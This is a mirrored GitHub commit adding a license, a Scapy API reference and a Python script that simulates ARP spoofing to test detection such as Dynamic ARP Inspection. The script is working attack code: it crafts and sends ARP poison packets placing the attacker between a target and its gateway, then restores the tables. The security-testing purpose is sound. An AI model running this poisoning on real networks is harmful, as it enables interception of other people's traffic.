mirror of
https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git
synced 2026-07-16 20:55:17 +03:00
Add folder anatomy (scripts/agent.py + references/api-reference.md) for 648 cybersecurity skills
Complete skill folder anatomy across all cybersecurity skills: - scripts/agent.py: 80-150 line Python agents using real libraries (impacket, boto3, azure-mgmt-*, kubernetes, pefile, yara, scapy, shodan, stix2, etc.) - references/api-reference.md: real API documentation with method signatures - LICENSE: MIT license for all skill folders
This commit is contained in:
@@ -0,0 +1,21 @@
|
||||
MIT License
|
||||
|
||||
Copyright (c) 2025 Anthropic Agent Skills Contributors
|
||||
|
||||
Permission is hereby granted, free of charge, to any person obtaining a copy
|
||||
of this software and associated documentation files (the "Software"), to deal
|
||||
in the Software without restriction, including without limitation the rights
|
||||
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
|
||||
copies of the Software, and to permit persons to whom the Software is
|
||||
furnished to do so, subject to the following conditions:
|
||||
|
||||
The above copyright notice and this permission notice shall be included in all
|
||||
copies or substantial portions of the Software.
|
||||
|
||||
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
||||
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
||||
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
||||
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
||||
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
|
||||
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
|
||||
SOFTWARE.
|
||||
@@ -0,0 +1,60 @@
|
||||
# API Reference: Performing ARP Spoofing Attack Simulation
|
||||
|
||||
## Scapy Library (Core)
|
||||
|
||||
| Function/Class | Description |
|
||||
|----------------|-------------|
|
||||
| `ARP(op="is-at", psrc=ip, hwsrc=mac)` | Construct ARP reply (poison) packet |
|
||||
| `Ether(dst=mac)` | Construct Ethernet frame with target MAC |
|
||||
| `srp(packet, timeout, iface)` | Send and receive layer 2 packets (ARP resolution) |
|
||||
| `sendp(packet, iface)` | Send packet at layer 2 without waiting for reply |
|
||||
| `get_if_hwaddr(iface)` | Get MAC address of local interface |
|
||||
| `get_if_list()` | List available network interfaces |
|
||||
| `conf.iface` | Get/set default network interface |
|
||||
|
||||
## ARP Packet Fields
|
||||
|
||||
| Field | Description |
|
||||
|-------|-------------|
|
||||
| `op` | Operation: `"who-has"` (request) or `"is-at"` (reply) |
|
||||
| `psrc` | Source protocol (IP) address |
|
||||
| `pdst` | Destination protocol (IP) address |
|
||||
| `hwsrc` | Source hardware (MAC) address |
|
||||
| `hwdst` | Destination hardware (MAC) address |
|
||||
|
||||
## Detection Verification Commands
|
||||
|
||||
| Command | Platform | Description |
|
||||
|---------|----------|-------------|
|
||||
| `show ip arp inspection statistics` | Cisco IOS | DAI statistics and violations |
|
||||
| `show ip arp inspection log` | Cisco IOS | DAI violation log entries |
|
||||
| `arpwatch -i eth0` | Linux | Monitor ARP table changes |
|
||||
| `ip neigh show` | Linux | Display current ARP cache |
|
||||
|
||||
## Key Libraries
|
||||
|
||||
- **scapy** (`pip install scapy`): Packet crafting and network interaction
|
||||
- **netifaces**: Cross-platform network interface information
|
||||
- **nmap** (python-nmap): Network host discovery as alternative to ARP scan
|
||||
|
||||
## Configuration
|
||||
|
||||
| Variable | Description |
|
||||
|----------|-------------|
|
||||
| Interface | Network interface on same VLAN as target (e.g., `eth0`) |
|
||||
| Root/Admin | Scapy requires root/administrator privileges for raw sockets |
|
||||
|
||||
## Safety Controls
|
||||
|
||||
| Control | Purpose |
|
||||
|---------|---------|
|
||||
| Written authorization | Legal requirement before any ARP spoofing |
|
||||
| `restore_arp()` | Always restore legitimate ARP entries after simulation |
|
||||
| Packet count limit | Limit spoofing rounds to minimum needed for detection test |
|
||||
| Isolated VLAN | Run simulation on isolated test network segment |
|
||||
|
||||
## References
|
||||
|
||||
- [Scapy Documentation](https://scapy.readthedocs.io/)
|
||||
- [Dynamic ARP Inspection (Cisco)](https://www.cisco.com/c/en/us/td/docs/switches/lan/catalyst9300/software/release/16-12/configuration_guide/sec/b_1612_sec_9300_cg/dynamic_arp_inspection.html)
|
||||
- [OWASP Testing Guide - Network](https://owasp.org/www-project-web-security-testing-guide/)
|
||||
@@ -0,0 +1,194 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
ARP Spoofing Attack Simulation Agent — AUTHORIZED TESTING ONLY
|
||||
Simulates ARP spoofing attacks using Scapy in controlled lab environments
|
||||
to test network detection capabilities and validate DAI countermeasures.
|
||||
|
||||
WARNING: Only use with explicit written authorization on isolated test networks.
|
||||
"""
|
||||
|
||||
import json
|
||||
import sys
|
||||
import time
|
||||
from datetime import datetime, timezone
|
||||
|
||||
from scapy.all import ARP, Ether, sendp, srp, conf, get_if_list, get_if_hwaddr
|
||||
|
||||
|
||||
def get_mac(ip: str, iface: str) -> str:
|
||||
"""Resolve MAC address for a given IP using ARP request."""
|
||||
ans, _ = srp(
|
||||
Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip),
|
||||
timeout=3, verbose=False, iface=iface,
|
||||
)
|
||||
if ans:
|
||||
return ans[0][1].hwsrc
|
||||
return None
|
||||
|
||||
|
||||
def scan_network(network_cidr: str, iface: str) -> list[dict]:
|
||||
"""Scan local network segment to discover active hosts."""
|
||||
ans, _ = srp(
|
||||
Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=network_cidr),
|
||||
timeout=5, verbose=False, iface=iface,
|
||||
)
|
||||
hosts = []
|
||||
for sent, received in ans:
|
||||
hosts.append({
|
||||
"ip": received.psrc,
|
||||
"mac": received.hwsrc,
|
||||
"responded": True,
|
||||
})
|
||||
return hosts
|
||||
|
||||
|
||||
def craft_arp_poison_packets(
|
||||
target_ip: str, target_mac: str,
|
||||
gateway_ip: str, gateway_mac: str,
|
||||
attacker_mac: str,
|
||||
) -> tuple:
|
||||
"""Craft ARP poison packets for target and gateway."""
|
||||
target_packet = Ether(dst=target_mac) / ARP(
|
||||
op="is-at",
|
||||
psrc=gateway_ip,
|
||||
hwsrc=attacker_mac,
|
||||
pdst=target_ip,
|
||||
hwdst=target_mac,
|
||||
)
|
||||
|
||||
gateway_packet = Ether(dst=gateway_mac) / ARP(
|
||||
op="is-at",
|
||||
psrc=target_ip,
|
||||
hwsrc=attacker_mac,
|
||||
pdst=gateway_ip,
|
||||
hwdst=gateway_mac,
|
||||
)
|
||||
|
||||
return target_packet, gateway_packet
|
||||
|
||||
|
||||
def send_arp_poison(
|
||||
target_pkt, gateway_pkt, iface: str, count: int = 5, interval: float = 2.0
|
||||
) -> dict:
|
||||
"""Send ARP poison packets and log the activity."""
|
||||
results = {"packets_sent": 0, "start_time": "", "end_time": ""}
|
||||
results["start_time"] = datetime.now(timezone.utc).isoformat()
|
||||
|
||||
for i in range(count):
|
||||
sendp(target_pkt, iface=iface, verbose=False)
|
||||
sendp(gateway_pkt, iface=iface, verbose=False)
|
||||
results["packets_sent"] += 2
|
||||
if i < count - 1:
|
||||
time.sleep(interval)
|
||||
|
||||
results["end_time"] = datetime.now(timezone.utc).isoformat()
|
||||
return results
|
||||
|
||||
|
||||
def restore_arp(
|
||||
target_ip: str, target_mac: str,
|
||||
gateway_ip: str, gateway_mac: str,
|
||||
iface: str,
|
||||
) -> None:
|
||||
"""Restore legitimate ARP entries to undo spoofing."""
|
||||
restore_target = Ether(dst=target_mac) / ARP(
|
||||
op="is-at",
|
||||
psrc=gateway_ip,
|
||||
hwsrc=gateway_mac,
|
||||
pdst=target_ip,
|
||||
hwdst=target_mac,
|
||||
)
|
||||
restore_gateway = Ether(dst=gateway_mac) / ARP(
|
||||
op="is-at",
|
||||
psrc=target_ip,
|
||||
hwsrc=target_mac,
|
||||
pdst=gateway_ip,
|
||||
hwdst=gateway_mac,
|
||||
)
|
||||
|
||||
for _ in range(5):
|
||||
sendp(restore_target, iface=iface, verbose=False)
|
||||
sendp(restore_gateway, iface=iface, verbose=False)
|
||||
time.sleep(0.5)
|
||||
|
||||
|
||||
def verify_detection(expected_alerts: list[str]) -> dict:
|
||||
"""Verify that security controls detected the ARP spoofing attempt."""
|
||||
return {
|
||||
"expected_detections": expected_alerts,
|
||||
"note": "Check IDS/IPS alerts, SIEM events, and switch DAI logs for ARP anomaly detections",
|
||||
"check_commands": [
|
||||
"show ip arp inspection statistics # Cisco switch DAI",
|
||||
"show ip arp inspection log # DAI violation log",
|
||||
"grep 'arp' /var/log/snort/alert # Snort ARP alerts",
|
||||
],
|
||||
}
|
||||
|
||||
|
||||
def generate_report(
|
||||
hosts: list, target_ip: str, gateway_ip: str,
|
||||
send_results: dict, detection: dict,
|
||||
) -> str:
|
||||
"""Generate ARP spoofing simulation report."""
|
||||
lines = [
|
||||
"ARP SPOOFING ATTACK SIMULATION REPORT — AUTHORIZED TESTING ONLY",
|
||||
"=" * 65,
|
||||
f"Date: {datetime.now(timezone.utc).strftime('%Y-%m-%d %H:%M UTC')}",
|
||||
"",
|
||||
f"Network Hosts Discovered: {len(hosts)}",
|
||||
f"Target: {target_ip}",
|
||||
f"Gateway: {gateway_ip}",
|
||||
"",
|
||||
"SIMULATION RESULTS:",
|
||||
f" Packets Sent: {send_results['packets_sent']}",
|
||||
f" Start: {send_results['start_time']}",
|
||||
f" End: {send_results['end_time']}",
|
||||
"",
|
||||
"DETECTION VERIFICATION:",
|
||||
]
|
||||
for cmd in detection["check_commands"]:
|
||||
lines.append(f" $ {cmd}")
|
||||
|
||||
return "\n".join(lines)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
print("[!] ARP SPOOFING SIMULATION — AUTHORIZED TESTING ONLY")
|
||||
print("[!] Ensure you have written authorization before proceeding.\n")
|
||||
|
||||
if len(sys.argv) < 4:
|
||||
print(f"Usage: {sys.argv[0]} <target_ip> <gateway_ip> <interface>")
|
||||
print(f" Example: {sys.argv[0]} 192.168.1.100 192.168.1.1 eth0")
|
||||
sys.exit(1)
|
||||
|
||||
target_ip = sys.argv[1]
|
||||
gateway_ip = sys.argv[2]
|
||||
iface = sys.argv[3]
|
||||
count = int(sys.argv[4]) if len(sys.argv) > 4 else 5
|
||||
|
||||
print(f"[*] Resolving MAC addresses on {iface}...")
|
||||
target_mac = get_mac(target_ip, iface)
|
||||
gateway_mac = get_mac(gateway_ip, iface)
|
||||
attacker_mac = get_if_hwaddr(iface)
|
||||
|
||||
if not target_mac or not gateway_mac:
|
||||
print("[!] Could not resolve MAC addresses. Ensure hosts are reachable.")
|
||||
sys.exit(1)
|
||||
|
||||
print(f"[*] Target: {target_ip} ({target_mac})")
|
||||
print(f"[*] Gateway: {gateway_ip} ({gateway_mac})")
|
||||
print(f"[*] Attacker: {attacker_mac}")
|
||||
|
||||
target_pkt, gw_pkt = craft_arp_poison_packets(
|
||||
target_ip, target_mac, gateway_ip, gateway_mac, attacker_mac
|
||||
)
|
||||
|
||||
print(f"[*] Sending {count} ARP poison rounds...")
|
||||
results = send_arp_poison(target_pkt, gw_pkt, iface, count=count)
|
||||
|
||||
print("[*] Restoring ARP tables...")
|
||||
restore_arp(target_ip, target_mac, gateway_ip, gateway_mac, iface)
|
||||
|
||||
detection = verify_detection(["DAI violation", "ARP anomaly IDS alert", "SIEM ARP event"])
|
||||
report = generate_report([], target_ip, gateway_ip, results, detection)
|
||||
print(report)
|
||||
Reference in New Issue
Block a user